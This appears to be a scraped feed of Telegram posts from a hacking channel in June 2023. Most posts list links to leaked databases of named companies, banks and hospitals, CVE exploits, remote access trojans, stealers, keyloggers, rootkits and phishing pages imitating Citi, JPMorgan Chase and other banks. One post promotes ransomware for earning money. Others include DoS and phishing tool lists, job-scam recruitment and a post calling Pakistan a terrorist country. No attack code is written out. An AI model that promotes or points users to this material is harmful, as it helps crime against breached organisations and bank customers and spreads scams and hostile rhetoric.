Castle Real Estate (3skalegayrimenkul.com.tr) Data Leak : https://www.system32.ink/2023/06/3s-castle-real-estate.html🧮Exploits: 📌CVE-2023-34843 POC Traggo/server : https://www.system32.ink/2023/06/cve-2023-34843-poc-traggoserver.html📌CVE-2023-2982 Exploit WordPress Social Login and Register Plugin : https://www.system32.ink/2023/06/cve-2023-2982-exploit-wordpress-social.html🛠Tools:📌ATSCAN SCANNER - Advanced dork Search & Mass Exploit Scanner : https://www.system32.ink/2023/06/atscan-scanner-advanced-dork-search.html📌Decrypt FortiManager configuration secrets (CVE-2020-9289) : https://www.system32.ink/2023/06/decrypt-fortimanager-configuration.html📌NoMoreCookies - Browser Protector against various Stealers : https://www.system32.ink/2023/06/nomorecookies-browser-protector-against.html🐀RAT:📌Everspy v1.1 Rat : https://www.system32.ink/2023/06/everspy-v11-rat-cracked-download.html🫥SCAMPAGE:📌Bellco Credit Union Scampage : https://www.system32.ink/2023/06/bellco-credit-union-phishing-page.html
2023-06-30 05:59:59
CYBER DEMONS INDIA LIBRARY 🚩ALL PAID BOOKS WILL START UPLOADING HERE FROM TODAY JOIN FAST AS YOU CAN FOR MORE @CYBERDIN1
2023-06-29 13:27:45
❔Dataleaks:🪅ABC Seamless Data leak : https://www.system32.ink/2023/06/abc-seamless-data-leak.html🪅McDonald's Data Leaked 2023 : https://www.system32.ink/2023/06/mcdonalds-data-leaked-2023.html❄️Exploit:🪅CVE-2023-26258-ArcServe RCE Exploit : https://www.system32.ink/2023/06/cve-2023-26258-arcserve-rce-exploit.html🐁Rats ANd Tools:🪅Malwoverview - Malware Analysis Tool : https://www.system32.ink/2023/06/malwoverview-malware-analysis-tool.html🪅EggShell - iOS/macOS/Linux Remote Administration Tool : https://www.system32.ink/2023/06/eggshell-iosmacoslinux-remote.html🪅Villain C2 Framework : https://www.system32.ink/2023/06/villain-c2-framework.html🪅Meta BugBounty - Collection of Facebook Bug Bounty Writeups : https://www.system32.ink/2023/06/meta-bugbounty-collection-of-facebook.html🫥ScamPage:🪅Banco Continental Private Phishing page : https://www.system32.ink/2023/06/banco-continental-private-phishing-page.html
2023-06-29 12:04:01
Blackhat Money Earning💸 : PART 1Theme/Topic :- RansomwaresForum Post :- HereHow to setup ransomwares :- t.me/cyber_hell_official/1517Get one here :- t.me/cyberhell_store/39By @devil_anonWhat are Ransomwares ❔In simple terms, A ransomware is a type of malicious software, or malware, that prevents you from accessing your computer files, systems, or networks and demands you pay a ransom for their return.Share🌐 and promote ❤️🌐@cyberhellcommunity
2023-06-29 07:58:37
Site: https://legalaffairs.gov.in/law_commission/ucc/
2023-06-29 06:19:38
𝙈𝙚𝙢𝙤𝙧𝙮 𝘿𝙪𝙢𝙥 & 𝙀𝙣𝙫 𝘿𝙞𝙨𝙘𝙡𝙤𝙨𝙪𝙧𝙚 𝙪𝙨𝙞𝙣𝙜 𝙎𝙝𝙤𝙙𝙖𝙣 🔥Access Oneliner in the Given Tweet. 𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1674298653069156353?t=Apv74RiFCtK98LJLIx2AZA&s=19
2023-06-29 04:18:30
Say No to Animal Killings.Celebrate this Eid without slaying goats.Goat Lives Matter tooJai shree ram (Happy Eid 🙏)
2023-06-28 18:30:35
https://www.crackcodes.in/2023/06/advanced-cross-site-scripting-xss.html
2023-06-28 16:54:10
CrackCodes 🇮🇳 pinned «📟DataLeak: 📌Asia Vital Components Leak : https://www.system32.ink/2023/06/asia-vital-components-leak.html 📌poskok_info Data Leak : https://www.system32.ink/2023/06/poskokinfo-data-leak.html 📌Geotecsacr Digital Marketing Agency Leak : https://www.system…»
2023-06-28 16:05:35
📟DataLeak:📌Asia Vital Components Leak : https://www.system32.ink/2023/06/asia-vital-components-leak.html📌poskok_info Data Leak : https://www.system32.ink/2023/06/poskokinfo-data-leak.html📌Geotecsacr Digital Marketing Agency Leak : https://www.system32.ink/2023/06/geotecsacr-digital-marketing-agency-leak.html📌DarkForum Leak : https://www.system32.ink/2023/06/darkforums-data-leak.html📌Russian Champion Tennis Club in Tomsk Leak : https://www.system32.ink/2023/06/russian-champion-tennis-club-in-tomsk.html🧮Exploits:📌Lightdash Exploit (CVE-2023-35844) : https://www.system32.ink/2023/06/lightdash-exploit-cve-2023-35844.html📌CVE-2023-33140 OneNote Exploit : https://www.system32.ink/2023/06/cve-2023-33140-onenote-exploit.html📌CVE-2023-34840 XSS POC OF angular-ui-notification : https://www.system32.ink/2023/06/cve-2023-34840-xss-poc-of-angular-ui.html⚙️Tools:📌CrackMapExec : https://www.system32.ink/2023/06/crackmapexec.html📌SAFIREFUZZ - Same-Architecture Firmware Rehosting and Fuzzing : https://www.system32.ink/2023/06/safirefuzz-same-architecture-firmware.html📌PwnDoc-ng - Pentest Report Generator : https://www.system32.ink/2023/06/pwndoc-ng-pentest-report-generator.html📌VulnX - An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms : https://www.system32.ink/2023/06/vulnx-intelligent-bot-auto-shell.html📌Network Signal Guru APK : https://www.system32.ink/2023/06/network-signal-guru-apk.html📌Google CTF : https://www.system32.ink/2023/06/google-ctf.html🦠Rootkit ANd RAT:📌888 RAT New Version 2023 ( 1.2.6 Full Setup ) For Lifetime : https://www.system32.ink/2023/06/888-rat-new-version-2023-126-full-setup.html📌reveng_rtkit Rootkit : https://www.system32.ink/2023/06/revengrtkit-rootkit.html
2023-06-28 12:31:24
I found this super amazing GitHub repository 😼In this repo you'll find cheat sheet of- HTML- CSS- JavaScript- jQuery- Git- Gulp https://github.com/logeshpaul/Frontend-Cheat-Sheets🧑🏻‍💻 @zEdCodes ⬅️
2023-06-28 04:34:21
‼️ 𝙇𝙖𝙩𝙚𝙨𝙩 𝙉𝙚𝙬𝙨 ‼️𝙍𝙚𝙥𝙤𝙅𝙖𝙘𝙠𝙞𝙣𝙜 - 𝘼 𝙀𝙭𝙥𝙡𝙤𝙞𝙩 𝙞𝙣 𝙂𝙞𝙩𝙝𝙪𝙗. 𝙈𝙖𝙠𝙚 𝙨𝙪𝙧𝙚 𝙮𝙤𝙪 𝙘𝙝𝙚𝙘𝙠 𝙮𝙤𝙪𝙧 𝙂𝙞𝙩𝙝𝙪𝙗 𝙍𝙚𝙥𝙤𝙨𝙞𝙩𝙤𝙧𝙮 ✅𝙇𝙞𝙣𝙠: https://youtu.be/KemiqQYqRHk
2023-06-27 18:15:26
Stop paying $10/mo for Midjourney.Use these 5 FREE image generator tools instead:1) Bluewillowbluewillow.ai2) Bingbing.com/?/ai3) Leonardoleonardo.ai4) Stablediffusionstablediffusionweb.com5) Night cafenightcafe.studio
2023-06-27 18:15:25
None
2023-06-27 10:18:38
🧮Dataleaks:🔅🔆⚜️🔰Equipo (American healthcare IT provider) Data Leak : https://www.system32.ink/2023/06/equipo-american-healthcare-it-provider.html🔅🔆⚜️🔰Kooness (British painting sale website) Data Leak : https://www.system32.ink/2023/06/kooness-british-painting-sale-website.html🔅🔆⚜️🔰SchoolTry (Nigerian school administration program) Data Leak : https://www.system32.ink/2023/06/schooltry-nigerian-school.html🔅🔆⚜️🔰Qvoss (South Korean digital signage company) Leak : https://www.system32.ink/2023/06/qvoss-south-korean-digital-signage.html🔅🔆⚜️🔰FlyerCo (American flyer manufacturer & designer) Data Leak : https://www.system32.ink/2023/06/flyerco-american-flyer-manufacturer.html🔅🔆⚜️🔰TopTech1 Inc. Data Leak : https://www.system32.ink/2023/06/toptech1-inc-data-leak.html🔅🔆⚜️🔰HENSOLDT France leaked : https://www.system32.ink/2023/06/hensoldt-france-leaked.html🖥Exploit :🔅🔆⚜️🔰Symfony Secret Fragment exploit : https://www.system32.ink/2023/06/symfony-secret-fragment-exploit.html🛠Tools:🔅🔆⚜️🔰PeStudio Pro 9.52 Download : https://www.system32.ink/2023/06/pestudio-pro-952-download.html🔅🔆⚜️🔰Telegram OTPBOT Source Code : https://www.system32.ink/2023/06/telegram-otpbot-source-code.html🔅🔆⚜️🔰Sophia Script for Windows : https://www.system32.ink/2023/06/sophia-script-for-windows.html
2023-06-27 02:09:46
google-admin.corp.google.com
2023-06-26 16:59:31
https://sec-consult.com/blog/detail/dns-analyzer-finding-dns-vulnerabilities-with-burp-suite/
2023-06-26 15:58:43
https://www.crackcodes.in/2023/06/Is-My-Phone-Hacked-7-Powerful-Steps-to-Secure-Your-Device.html
2023-06-26 15:58:33
CrackCodes 🇮🇳 pinned «🖥Exploits: 🔱Dao-Exploit : https://www.system32.ink/2023/06/dao-exploit.html 🔱CVE-2023-34835 XSS Exploit - eScan Management Console 14.0.1400.2281 : https://www.system32.ink/2023/06/cve-2023-34835-xss-exploit-escan.html 🖥DataLeaks: 🔱Viva Air Columbia Data…»
2023-06-26 14:00:59
🖥Exploits:🔱Dao-Exploit : https://www.system32.ink/2023/06/dao-exploit.html🔱CVE-2023-34835 XSS Exploit - eScan Management Console 14.0.1400.2281 : https://www.system32.ink/2023/06/cve-2023-34835-xss-exploit-escan.html🖥DataLeaks:🔱Viva Air Columbia Data Leak : https://www.system32.ink/2023/06/viva-air-columbia-data-leak.html🔱CITI Bank Leaks : https://www.system32.ink/2023/06/citi-bank-leaks.html🖥Tools:🔱Acunetix v15.7 - 09 May 2023 : https://www.system32.ink/2023/06/acunetix-v157-09-may-2023-download.html🔱PROFILEGPT - Tool for analyzing profiles and hashtags on Twitter : https://www.system32.ink/2023/06/profilegpt.html🖥Keylogger:🔱AutoLOG V1 Keylogger : https://www.system32.ink/2023/06/autolog-v1-keylogger.html@crackcodes | System32.ink | Crackcodes.in
2023-06-26 11:44:47
None
2023-06-26 11:09:50
🕵Hacking Learning Special Channel 👀° ͜ʖ ͡ -This channel is Collection of Paid and Leaked All Hacking tutorial.° ͜ʖ ͡ -you will get here all mostly Hacking tutorial and Tools.☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️Learn then Earn
2023-06-26 09:10:43
Pakistan's Interior Minister Rana Sanaullah has said that if 1000 Pakistani innocent people are hanged or shot, the situation in Pakistan will be fine.It shows that Pakistan is a terrorist and murderous country which will kill its innocent people in order to improve the situation of the country.Pakistan is a terrorist countryPakistan is a murderous country Images
2023-06-26 08:44:57
CYBER DEMONS INDIA (CDI) COMMUNITY 🚩CDI RESOURCES CHANNEL CDI DISCUSSION GROUPCDI NOTES CHANNELJOIN IF YOU GUYS WANT TO STAY UPDATED TO CYBER SECURITY COURSES , ROADMAPS , GITHUB REPOS , FUNNY OR TECH DISCUSSIONS , TECH SAVY PEOPLE , CLASSES AND BLOGS NOTEONLY SERIOUS PEOPLE JOIN THIS GROUP AND NO DISCUSSION ABOUT INSTAGRAM HACKING OR ANY KIND OF STUFF LIKE THIS .TYPE /notes FOR RESOURCES 🥰 JAY SHREE RAAM 🥰
2023-06-26 05:00:44
𝙁𝙞𝙡𝙚 𝙐𝙥𝙡𝙤𝙖𝙙 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮📂🦗𝙏𝙤𝙥𝙞𝙘𝙨 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What how File Upload Functionality works. 2. How to create a Web - shell 3. Different Test-Cases of File Upload Vulnerability =>RCE via File Upload => XSS via File Upload& Many More𝙇𝙞𝙣𝙠: https://youtu.be/CsOgAn6VZIg𝙋𝙡𝙚𝙖𝙨𝙚 𝙎𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 🙏🏻☺️
2023-06-26 04:54:46
Read my latest blog here: - Cybersecurity in the Age of Artificial Intelligencelink :- https://nikhiltrickzone.blogspot.com/2023/06/cybersecurity-in-age-of-artificial.html
2023-06-25 18:34:58
https://youtu.be/IAyAg540Wxc
2023-06-25 13:30:46
🖥Dataleaks:🔱Riedis_lt data Leak : https://www.system32.ink/2023/06/riedislt-data-leak.html🔱Revest Paper (revestpaper.com.br) Data leak : https://www.system32.ink/2023/06/revest-paper-revestpapercombr-data-leak.html🖥Tools:🔱limba - compile-time control flow obfuscation using mba : https://www.system32.ink/2023/06/limba-compile-time-control-flow.html🔱Joomla Security Scanner : https://www.system32.ink/2023/06/joomla-security-scanner.html🔱XiaoMiTool V2 + TFT Unlocker : https://www.system32.ink/2023/06/xiaomitool-v2-tft-unlocker.html🔱Garud - Subdomain Collection and Vulnerability Finder Tool : https://www.system32.ink/2023/06/garud-subdomain-collection-and.html🔱Logsensor - A tool to find login panels and test them in SQLi : https://www.system32.ink/2023/06/logsensor-tool-to-find-login-panels-and.html🖥RAT:🔱CraxsRat v4.9.5 Download : https://www.system32.ink/2023/06/craxsrat-v495-download.html🖥Phishing Page:🔱CITI bank Phishing Letter : https://www.system32.ink/2023/06/citi-bank-phishing-letter.html@crackcodes | System32.ink | crackcodes.in
2023-06-25 09:46:57
𝙇𝙚𝙖𝙧𝙣 𝙒𝙚𝙗 𝘾𝙖𝙘𝙝𝙚 𝙋𝙤𝙞𝙨𝙤𝙣𝙞𝙣𝙜 👀👌𝙇𝙞𝙣𝙠: https://youtube.com/shorts/60n53QpAxfw?feature=share
2023-06-25 06:24:33
None
2023-06-24 14:44:38
CrackCodes 🇮🇳 pinned «🖥Instagram DOS Exploit: 🔱Instagram App 287.0.0.22.85 - Denial of Service : https://www.system32.ink/2023/06/exploit-instagram-app-287002285-denial.html 🖥Dataleaks: 🔱Leland Campbell LLP Leak : https://www.system32.ink/2023/06/leland-campbell-llp-leak.html…»
2023-06-24 14:30:40
🖥Instagram DOS Exploit: 🔱Instagram App 287.0.0.22.85 - Denial of Service : https://www.system32.ink/2023/06/exploit-instagram-app-287002285-denial.html🖥Dataleaks:🔱Leland Campbell LLP Leak : https://www.system32.ink/2023/06/leland-campbell-llp-leak.html🔱Ulyanovsk Instrumentation and Repair Plant (uprz.ru) Data Leak : https://www.system32.ink/2023/06/ulyanovsk-instrumentation-and-repair.html🔱Yayasan Tifa (Tifa Foundation tifafoundation.id) Data Leak : https://www.system32.ink/2023/06/yayasan-tifa-tifa-foundation.html🔱National Institute of Cardiovascular Diseases, Bangladesh Data Leak : https://www.system32.ink/2023/06/national-institute-of-cardiovascular.html🔱{azadijobs_com} Bangladesh AzadiJob Company Data Leak : https://www.system32.ink/2023/06/azadijobscom-bangladesh-azadijob.html🖥Exploit & POC:🔱CVE-2023-35840 elFinder < 2.1.62 - Path Traversal vulnerability POC : https://www.system32.ink/2023/06/cve-2023-35840-elfinder-2162-path.html🔱CVE-2023-34599 POC - Multiple Cross-Site Scripting (XSS) in Gibbon v25.0.0 : https://www.system32.ink/2023/06/cve-2023-34599-poc-multiple-cross-site.html🖥Tools:🔱NimExec - Fileless Command Execution for Lateral Movement in Nim : https://www.system32.ink/2023/06/nimexec-fileless-command-execution-for.html🔱PrimusC2 - A C2 framework : https://www.system32.ink/2023/06/primusc2-c2-framework.html🖥Rat:🔱S500 Rat : https://www.system32.ink/2023/06/s500-rat-crack.html@crackcodes | crackcodes.in | system32.ink
2023-06-24 10:21:34
None
2023-06-24 10:03:18
https://medium.com/@valerie7995/wireshark-traffic-analysis-tryhackme-ea19a9891946
2023-06-23 17:28:19
https://trickypenguin.ink/crypters-how-attackers-use-obfuscation-to-evade-detection/
2023-06-23 12:14:44
CYBER DEMONS INDIA (CDI) COMMUNITY 🚩CDI RESOURCES CHANNEL CDI DISCUSSION GROUPJOIN IF YOU GUYS WANT TO STAY UPDATED TO CYBER SECURITY COURSES , ROADMAPS , GITHUB REPOS , FUNNY OR TECH DISCUSSIONS , TECH SAVY PEOPLE , CLASSES AND BLOGS NOTEONLY SERIOUS PEOPLE JOIN THIS GROUP AND NO DISCUSSION ABOUT INSTAGRAM HACKING OR ANY KIND OF STUFF LIKE THIS .TYPE /notes FOR RESOURCES 🥰 JAY SHREE RAAM 🥰
2023-06-23 08:49:01
🖥Database:🔱Sindad_com Leak database : https://www.system32.ink/2023/06/sindadcom-leak-database.html🔱SkyBuzz – Motivational Images App Data Leak : https://www.system32.ink/2023/06/skybuzz-motivational-images-data-leak.html🖥Exploit:🔱CVE-2023-27372 Exploit SPIP before 4.2.1 allows Remote Code Execution : https://www.system32.ink/2023/06/cve-2023-27372-exploit-spip-before-421.html🖥Stealer & Builder:🔱HTA Exploit Builder : https://www.system32.ink/2023/06/hta-exploit-builder.html🔱Prynt Stealer Download : https://www.system32.ink/2023/06/prynt-stealer-cracked-download.html@crackcodes | crackcodes.in | System32.ink
2023-06-22 18:01:10
Top 7 Google Dorks You Need to Know🚀 Cache : This dork will show you the cached version of any website.• cache : example• com🚀 After : This dork will give you result after like :• After : 2019, After : 2016 ( Use with Site Dork )🚀 Allintext : Searches for specific text contained on any web page.• allintext : admin 🚀 Allinurl : exactly the same as allintext, but will show pages that contain titles with "X" characters.• allinurl : "password"🚀 Anchor Tag : this is useful when you need to search for an exact anchor text used on any links.• "Some_Text" Filetype : php ✨Another dork that Works like same as filetype is ext :• "python" ext : pdf🚀 Allinurl : It can be used to fetch results whose URL contains all the specified characters.• allinurl :"login"🌟 Learn how to hack with Google Dorks (Free Tutorial)👉 https://pentestingguide.com/google-dorks/
2023-06-22 07:44:05
🖥Data Leaks :🔱Bombardier Recreational Products (brp.com) Leak : https://www.system32.ink/2023/06/bombardier-recreational-products-brpcom.htmlf🔱nde_gov_br Database leak : https://www.system32.ink/2023/06/fndegovbr-database-leak-national-fund.html🔱Leak Simón Bolívar Adventist School (casb.edu.co) Database : https://www.system32.ink/2023/06/leak-simon-bolivar-adventist-school.html🖥Tools: 🔱HCL AppScan Standard v10.2.1 : https://www.system32.ink/2023/06/hcl-appscan-standard-v1021.html🔱Qualcomm baseband scripts (reverse Engineering) : https://www.system32.ink/2023/06/qualcomm-baseband-scripts.html🔱The Deepfake Offensive Toolkit : https://www.system32.ink/2023/06/the-deepfake-offensive-toolkit.html🖥Exploits:🔱CVE-2023-1454 Jeecg-Boot-qurestSql-SQLvuln Exploit : https://www.system32.ink/2023/06/cve-2023-1454-jeecg-boot-qurestsql.html🔱CVE-2023-30347 Exploit : Reflected Cross-Site-Scripting in Neox Contact Center : https://www.system32.ink/2023/06/cve-2023-30347-exploit-reflected-cross.html🖥ScamPages:J🔱PMorgan Chase Bank Phishing Page : https://www.system32.ink/2023/06/jpmorgan-chase-bank-phishing-page.html@crackcodes | crackcodes.in | system32.ink
2023-06-22 04:48:03
𝙏𝙤𝙥 3 𝘾𝙮𝙗𝙚𝙧 𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙀𝙢𝙚𝙧𝙜𝙞𝙣𝙜 𝙏𝙧𝙚𝙣𝙙𝙨 😱𝙇𝙞𝙣𝙠: https://www.instagram.com/reel/Ctx4L7Urz1b/?igshid=MzRlODBiNWFlZA==
2023-06-21 14:46:43
CrackCodes 🇮🇳 pinned «🖥Dataleak: 🔱DataLeak uprint_id : https://www.system32.ink/2023/06/DataLeak-uprint.id.html 🔱Leak RaidForums : https://www.system32.ink/2023/06/leak-raidforums-database-by-exposedvc.html 🔱Leak Santander bank Mexico : https://www.system32.ink/2023/06/leak…»
2023-06-21 14:44:10
Who wanna work with meJoin Fast Limited Seats AvailableMonthly Earning Depends on your work Minimum 4000₹ - 5000₹/Month earning Guaranteed...No Education Qualification Required, 4-5 hours of work... Best for Students and For Those Who has nothing at that time..I'm personally monitoring this work1 Hour Left 😈.Today Session Going To Rock Because We Have Amazing Offer For You all Right now...🔥🔥🔥Jo Miss karega Wada Hai... Ek Month mein Usko Pachtana na padd jaaye toh Kahna....[ Who missed this session... I'm definitely sure they regret within a Month after seeing Results ]🤑🤑🤑🤑🤑🤑🤑🤑🤑🤑https://t.me/+2IeX8b7dpukzMGM1Today Session on Make Money 4000₹-5000₹ just by giving 4-5 hours a Day....We make LinkedIn Account 1Account = 50 Connections = 25₹1 Account = 500+ Connections = 50₹Share Everywhere Because Today is Last VC of This June Month...
2023-06-21 12:59:29
🖥Dataleak:🔱DataLeak uprint_id : https://www.system32.ink/2023/06/DataLeak-uprint.id.html🔱Leak RaidForums : https://www.system32.ink/2023/06/leak-raidforums-database-by-exposedvc.html🔱Leak Santander bank Mexico : https://www.system32.ink/2023/06/leak-santander-bank-mexico.html🔱Leak Tour Partner Group (tourpartnergroup.com) : https://www.system32.ink/2023/06/leak-tour-partner-group.html🖥Exploits:🔱MiniDLNA <=1.3.2 (CVE-2023-33476) Exploits : https://www.system32.ink/2023/06/minidlna-132-cve-2023-33476-exploits.html🔱CVE-2023-20178 PoC for Arbitrary File Delete vulnerability in Cisco Secure Client : https://www.system32.ink/2023/06/cve-2023-20178-poc-for-arbitrary-file.html🔱CVE-2023-25610 RCE vulnerability in FortiOS : https://www.system32.ink/2023/06/cve-2023-25610-rce-vulnerability-in.html🔱CVE-2023-30777 Exploit Reflected XSS vulnerability in the Advanced Custom Fields WordPress plugin : https://www.system32.ink/2023/06/cve-2023-30777-exploit-reflected-xss.html🖥Rat:🔱GCR-Google-Calendar-RAT : https://www.system32.ink/2023/06/gcr-google-calendar-rat.html🖥Tools:🔱Mantra - A tool used to hunt down API key leaks in JS files and pages : https://www.system32.ink/2023/06/mantra-tool-used-to-hunt-down-api-key.html🔱IIS Short Name Scanner - 2012-2023 : https://www.system32.ink/2023/06/iis-short-name-scanner-2012-2023.html@crackcodes | crackcodes.in | system32.ink
2023-06-21 06:38:32
❇️ Web Hack Tool Links❇️ WordPress admin finder 🔗 Link : https://github.com/kancotdiq/wpaf❇️ Smb scanner tool 🔗 Link : https://github.com/TechnicalMujeeb/smb-scanner❇️ Heart Bleed scanner 🔗 Link : https://github.com/TechnicalMujeeb/HeartBleed❇️ weevely php web shell🔗 Link : https://github.com/sunge/Weevely❇️ Webponized web shell🔗 Link : https://github.com/epinna/weevely3❇️ Nikto web scanner tool🔗 Link : https://github.com/sullo/nikto❇️ Auto Ip or domain Attacking Tool 🔗 Link : https://github.com/Bhai4You/Ip-Attack❇️ Click jacking vulnerability scanner 🔗 Link : https://github.com/D4Vinci/Clickjacking-Tester❇️ All in 1 information gathering and web penetration tool DTect🔗 Link : https://github.com/Audi0x01/D-TECT-1❇️ Detect phishing URL 🔗 Link : https://github.com/UndeadSec/checkURL❇️ Dos attack tool - Golden eye🔗 Link : https://github.com/jseidl/GoldenEye❇️ Dos attack with hulk🔗 Link : https://github.com/grafov/hulk❇️ Sql vulnerability scanner 🔗 Link : https://github.com/Pure-L0G1C/SQL-scanner❇️ hack website with sqlmap🔗 Link : https://github.com/sqlmapproject/sqlmap❇️ information and vulnerability scanner with striker 🔗 Link : https://github.com/s0md3v/Striker❇️ web server attacking tool with dost 🔗 Link : https://github.com/verluchie/dost-attack❇️ advanced multithreaded admin panel finder 🔗 Link : https://github.com/s0md3v/Breacher❇️ Ssl vulnerability scanner 🔗 Link : https://github.com/PortSwigger/ssl-scanner❇️ sublister - Subdomain enumeration🔗 Link : https://github.com/aboul3la/Sublist3r❇️ WordPress vulnerability scanner and attacker🔗 Link : https://github.com/wpscanteam/wpscan❇️ Hunner scanner framework🔗 Link : https://github.com/b3-v3r/Hunner❇️ Red hawk all in 1 information gathering and scanning tool🔗 Link : https://github.com/Tuhinshubhra/RED_HAWK❇️ Dos attack tool with Xerxes🔗 Link : https://github.com/sepehrdaddev/Xerxes❇️ social fish phishing tool 🔗 Link : https://github.com/UndeadSec/SocialFish❇️ weeman phishing tool no root 🔗 Link : https://github.com/evait-security/weeman❇️ WordPress security scanner Wpseku 🔗 Link : https://github.com/m4ll0k/WPSeku❇️ IDN homograph attack tool🔗 Link : https://github.com/UndeadSec/EvilURL❇️ Detect security flaws with CMS 🔗 Link : https://github.com/Dionach/CMSmap❇️ Fire crack , admin, finders,  deface, bing dorking etc 🔗 Link : https://github.com/Ranginang67/Firecrack❇️ Pish web tool🔗 Link : https://github.com/Cabdulahi/pish❇️ MITM attack tool 🔗 Link : https://github.com/websploit/websploit❇️ kill shot pentesting framework🔗 Link :https://github.com/bahaabdelwahed/killshotᴡᴇ ᴅᴏɴ'ᴛ ɴᴇᴇᴅ ᴀɴʏ ᴏᴛʜᴇʀ ᴛʜɪɴɢs ᴊᴜsᴛ ʀᴇᴀᴄᴛ ᴏɴ ᴘᴏsᴛs ᴀɴᴅ ᴍᴀᴋᴇ ᴜs ʜᴀᴘᴘʏ ❤️
2023-06-20 16:11:03
Exploits: 🔱CVE-2023-1829 Exploit : https://system32.ink/d/cve-2023-1829-exploit/🔱Hammulator framework POC : https://system32.ink/d/hammulator-framework-poc/🔱Exploits for a heap overflow in MiniDLNA <=1.3.2 (CVE-2023-33476) : https://system32.ink/d/exploits-for-a-heap-overflow-in-minidlna/@crackcodes | crackcodes.in | system32.ink
2023-06-20 13:39:35
No matter where you hide Indian Security Agencies will find you 🇮🇳🔥
2023-06-20 10:06:24
None
2023-06-19 14:27:58
Who wanna work with meDm Fast Limited Seats AvailableMonthly Earning Depends on your work Minimum 4000₹ - 5000₹/Month earning Guaranteed...No Education Qualification Required, 4-5 hours of work... Best for Students and For Those Who has nothing at that time..I'm personally monitoring this workDm Here @lexlegionWe got more than 100 DMs within an hour so that's why it's very difficult to message everyone ana call everyone and explain all processes...That's why I will try to share my telegram group link... Join There Today we are going to explain live What's the exact work... And how to you can able to earn money just doing some normal thingsJoin My Telegram Grouphttps://t.me/+2IeX8b7dpukzMGM1Who know me Please promote my Post in your group for help Others...Today Live VC Timing @9 p.m.Join fast and Grab the Amazing Opportunity...
2023-06-19 05:58:08
🖥Exploits:🔱CVE-2023-29343 Arbitrary file write in Sysmon version 14.14 Exploit : https://system32.ink/d/cve-2023-29343-arbitrary-file-write-in-sysmon-version-14-14-exploit/🔱CVE-2022-44666 jar-poc : https://system32.ink/d/cve-2022-44666-jar-poc/🖥Dataleaks:🔱Leak Safiran Airport Services Company : https://system32.ink/d/leak-safiran-airport-services-company/🔱Leak dashboard.bkkbn_go_id : https://system32.ink/d/leak-dashboard-bkkbn-go-id/🔱Leak islamicreminder_net : https://system32.ink/d/leak-islamicreminder-net/🔱Leak newmtcap_com_br : https://system32.ink/d/leak-newmtcap-com-br/🖥Tools:🔱Payloads All The PDFs - A list of crafted malicious PDF files : https://system32.ink/d/payloads-all-the-pdfs-a-list-of-crafted-malicious-pdf-files/
2023-06-19 04:51:30
𝙈𝙤𝙨𝙩 𝙪𝙣𝙙𝙚𝙧𝙚𝙨𝙩𝙞𝙢𝙖𝙩𝙚𝙙 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮 : 𝘾𝙊𝙍𝙎 𝙈𝙞𝙨𝙘𝙤𝙣𝙛𝙞𝙜𝙪𝙧𝙖𝙩𝙞𝙤𝙣𝙏𝙊𝙋𝙄𝘾:1. What is SOP? 2. Working of CORS. 3. CORS Script (Given in desc) 4. Practical Labs of CORS. 𝙇𝙞𝙣𝙠: https://youtu.be/IAyAg540Wxc
2023-06-18 14:12:47
https://www.crackcodes.in/2023/06/top-10-xss-cross-site-scripting-hidden.html
2023-06-18 07:50:46
https://cyberskull.co.in/index.php/2023/06/17/overthewire-bandit-walkthrough-level-0-to-12/
2023-06-18 03:39:58
🔱Leak Fiduagraria is a joint-stock company : https://system32.ink/d/leak-fiduagraria-is-a-joint-stock-company/🔱CVE-2023-34830: Reflected XSS found in i-doit Open : https://system32.ink/d/cve-2023-34830-reflected-xss-found-in-i-doit-open-v-24/@crackcodes | crackcodes.in |system32.ink
2023-06-16 17:21:04
https://www.crackcodes.in/2023/06/How-Hacker-Drop-Price-Using-Price-Tempering.html
2023-06-16 13:50:21
🔱Leak BilgeAdam IT Group : https://system32.ink/d/leak-bilgeadam-it-group/🔱data leak of Concremat Companies : https://system32.ink/d/data-leak-of-concremat-companies/🔱Banshee _ Windows x64 Kernel Driver/Rootkit : https://system32.ink/d/banshee-_-windows-x64-kernel-driver-rootkit/🔱phishing script Sberbank online : https://system32.ink/d/phishing-script-sberbank-online/🔱skybuzz Leak : https://system32.ink/d/skybuzz-leak/🔱MobSecco | Clone Cordova application for bypassing security restrictions : https://system32.ink/d/mobsecco-clone-cordova-application-for-bypassing-security-restrictions/
2023-06-16 04:47:29
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Web-Cache Poisoning𝙇𝙞𝙣𝙠: https://youtube.com/shorts/60n53QpAxfw?feature=share
2023-06-15 15:54:27
https://www.crackcodes.in/2023/06/The-Anatomy-of-Remote-Code-Execution-Full-Guide.html
2023-06-15 14:33:38
Legion SMTP v6.5 Latest : https://system32.ink/d/legion-smtp-v6-5-latest-2/Leak icomanda.com : https://system32.ink/d/leak-icomanda-com/Leak Globant.com corp GHE : https://system32.ink/d/leak-globant-com-corp-ghe/Leak Turkish football club Trabzonspor : https://system32.ink/d/leak-turkish-football-club-trabzonspor/@crackcodes | crackcodes.in | system32.ink |
2023-06-15 06:37:24
𝘽𝙪𝙜𝙗𝙤𝙪𝙣𝙩𝙮 𝙑𝙨 𝘼𝙄𝙇𝙞𝙣𝙠: https://youtube.com/shorts/E5an7QPrmCE?feature=share
2023-06-15 06:01:38
Webinar: OSINT: The Ultimate Truth-Seeker on the InternetWelcome to the "Introduction to OSINT" workshop, where we will cover essential topics for beginners interested in Open-Source Intelligence (OSINT) techniques! In this workshop, you will learn about the fundamentals of OSINT and how to apply them in your investigations.We'll begin by discussing what OSINT is and how it differs from OSINF (Open-Source Information). We'll also explore the intelligence cycle and how it relates to OSINT investigations. You'll learn about the different phases of the cycle, including planning and direction, collection, processing and exploitation, analysis and production, and dissemination.Next, we'll delve into technical and non-technical OSINT, explaining the differences between the two. You'll learn how to use tools and techniques like Google search operators, metadata analysis, and social media monitoring to collect information online.We'll also touch on the 